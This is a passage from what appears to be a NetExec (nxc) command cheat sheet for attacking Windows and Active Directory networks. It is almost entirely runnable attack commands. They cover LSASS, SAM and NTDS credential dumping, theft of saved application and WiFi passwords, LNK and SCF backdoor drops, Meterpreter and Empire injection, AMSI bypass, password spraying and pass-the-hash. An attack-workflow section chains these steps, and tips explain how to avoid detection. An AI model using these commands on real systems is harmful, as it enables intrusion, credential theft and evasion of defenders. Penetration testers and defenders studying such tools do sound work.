--sccm disk # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010 # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M coerce_plus # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider # Recursive LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1 # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++ # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123 # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986 # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986 # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15 # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass --ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\" # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host' # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce # Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5 # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10 # Basic enumeration\nnxc nfs 192.168.1.10 --shares # List shares\nnxc nfs 192.168.1.10 --enum-shares # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5 # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256 # Number of threads (default: 256)\n--timeout 10 # Connection timeout in seconds\n--jitter 5 # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose # Verbose output\n--debug # Debug mode\n--log output.log # Save output to file\n--no-progress # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6 # Force IPv6\n--dns-server 8.8.8.8 # Custom DNS server\n--dns-tcp # Use TCP for DNS queries\n--dns-timeout 3 # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1 # Use credential ID from database\n-id 1 2 3 # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https # Use HTTPS server (default)\n--server http # Use HTTP server\n--server-host 0.0.0.0 # Bind server to IP\n--server-port 8000 # Server port\n--connectback-host IP # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb # Access NXC database\nexport smb # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L # List all SMB modules\nnxc smb -M --options # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}